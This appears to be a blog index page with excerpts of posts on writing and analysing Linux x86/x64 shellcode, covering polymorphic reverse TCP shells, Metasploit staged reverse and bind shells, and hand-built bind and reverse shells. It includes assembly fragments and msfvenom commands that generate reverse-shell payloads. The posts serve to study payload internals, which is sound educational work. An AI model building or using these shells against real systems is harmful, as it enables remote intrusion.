Shellcode Polymorphism Examples (x64)

This blog post shows polymorphic transformation of three Linux Intel x64 shellcodes. 1. Dynamic null-free reverse TCP shell Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-907.php Original shellcode with analysis push byte 41 pop rax ; syscall number 41, int socket(int domain, int type, int protocol) cdq ; zeroing RDX via sign extension push byte 2 pop rdi ; RDI = 2, int …

Analysis of Metasploit linux/x64/shell/reverse_tcp shellcode

linux/x64/shell/reverse_tcp staged shellcode generally consists of following steps Map 4096 bytes in process’ VAS memory Create and connect socket to remote address and port Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 –platform linux LHOST=127.1.1.2 LPORT=5555 -o staged_reverse_tcp Set up …

Analysis of Metasploit linux/x64/shell/bind_tcp shellcode

linux/x64/shell/bind_tcp staged shellcode generally consists of following steps Create listening port and wait for connection Map 4096 bytes in process’ VAS memory Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/bind_tcp -f elf -a x64 –platform linux LPORT=1234 -o staged_bind_tcp_x64 Execute the stager $ chmod …

Creating password protected TCP reverse shell shellcode (x64)

This blog post describes manual creating of password protected TCP reverse shellcode on Intel 64-bit architecture and Linux platform. If you have already read previous blog post how to create bind shell you will find this post very easy to follow as the progress is almost the same. We will start with following C code. Difference between bind and reverse …

Creating password protected TCP bind shell shellcode (x64)

This blog post describes manual creating of password protected TCP bind shell shellcode on Intel 64-bit architecture and Linux platform. We will start with following C code. Bind shell C code analysis Call to socket() creates a connection socket(1) and returns file descriptor(2) which identifies this socket later on. First argument selects the protocol family which will be used for …

Creating TCP reverse shell shellcode

This blog post describes manual creating of TCP reverse shellcode on Intel 32-bit architecture and Linux platform. If you have already read previous blog post how to create bind shell you will find this post very easy to follow as the progress is almost the same. We will start with following C code. Difference between bind and reverse shell mechanism …

Creating TCP bind shell shellcode

This blog post describes manual creating of TCP bind shell shellcode on Intel 32-bit architecture and Linux platform. We will start with following C code. At first glance this program lacks any debugging and exception handling amenities but from security perspective we need smaller C code: so that the final shellcode fits into tight memory on the target machine which …